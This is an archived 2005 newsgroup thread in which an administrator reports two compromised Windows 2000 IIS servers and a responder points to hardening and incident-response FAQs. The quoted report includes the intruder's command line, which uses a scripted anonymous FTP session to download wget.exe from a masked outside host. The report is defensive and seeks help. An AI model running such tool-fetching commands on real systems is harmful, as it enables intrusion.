Re: Server Hacked - Assessment and Prevention

• Previous message: Karl Levinson, mvp: "Re: Problem about RPC (remote procedure call) - need help urgently"
• In reply to: john d: "Server Hacked - Assessment and Prevention"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Mon, 23 May 2005 20:48:03 -0400

If your server was really fully patched, then I assume either a sub-optimal
configuration or a different app that wasn't patched was the problem.
Usually these compromises are done via well known issues. I recommend
these:

http://securityadmin.info/faq.asp#ftpfolder
http://securityadmin.info/faq.asp#hacked
http://securityadmin.info/faq.asp#harden

"john d" <johnd@discussions.microsoft.com> wrote in message
news:2027AC13-EF0B-4F7F-A2A1-C6A7143D0007@microsoft.com...
> I have 2 Windows 2000 Server Machines running IIS, which have been
> compromised. I am trying to determine to what extent and more importantly
> prevent this form reoccuring.
>
> I first noticed an issue because I received a virus alert from my Virus
> scanning software on the servers indicating the following:
>
> The file C:\WINNT\system32\full.exe\000ae8a4.EXE is infected with
> HackerDefender.sys Trojan. The file was successfully deleted. user NT
> AUTHORITY\SYSTEM
>
> When I check the Server monitors, I found a command prompt open on the
> screen, with the following:
>
>
> C:\WINNT\system32>ftp -v -A -s:ftp.scr xxx.xxx.xxx.xxx
> Anonymous login secceeded for SYSTEM@server1.domain.com
> ftp>get wget.exe
> ftp>
>
> (Note: I have replaced the hacker's IP in the message above with x's)
>
> I checked the security log and found that the intruder has cleared the
> entries from that day. I have deleted ftp.scr from the server.
>
> How can I prevent this form reoccuring? How I can determine what, if any,
> damage has been done?

• Previous message: Karl Levinson, mvp: "Re: Problem about RPC (remote procedure call) - need help urgently"
• In reply to: john d: "Server Hacked - Assessment and Prevention"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages Re: Server Hacked - Assessment and Prevention ... > I first noticed an issue because I received a virus alert from my Virus ... I have deleted ftp.scr from the server. ... > How can I prevent this form reoccuring? ... I actaully found in my IIS logs a while back, ... (microsoft.public.win2000.security) Re: Locating a server ... forum is truly hosted overseas i.e. ... would have to pass through that server anyway, so it's as equally open to ... to the types of compromises they claim to be safer from. ... give real information. ... (alt.computer.security) Re: Govt Warns of Major Web Attack ... IIS 5 Web Server Compromises ... contain malicious code that can affect the end-user's system. ... (comp.security.firewalls) Server Hacked - Assessment and Prevention ... I have 2 Windows 2000 Server Machines running IIS, ... I first noticed an issue because I received a virus alert from my Virus ... When I check the Server monitors, I found a command prompt open on the ... How can I prevent this form reoccuring? ... (microsoft.public.win2000.security) Re: Disable badmail or NDR? ... now they are bouncing and bouncing and bouncing... ... from a legitimate and otherwise well-configured server. ... If you're trying to absorb this storm of NDRs for a single recipient, ... remote Joe Jobs and local mailbox compromises (in addition to their ... (microsoft.public.inetserver.iis.smtp_nntp)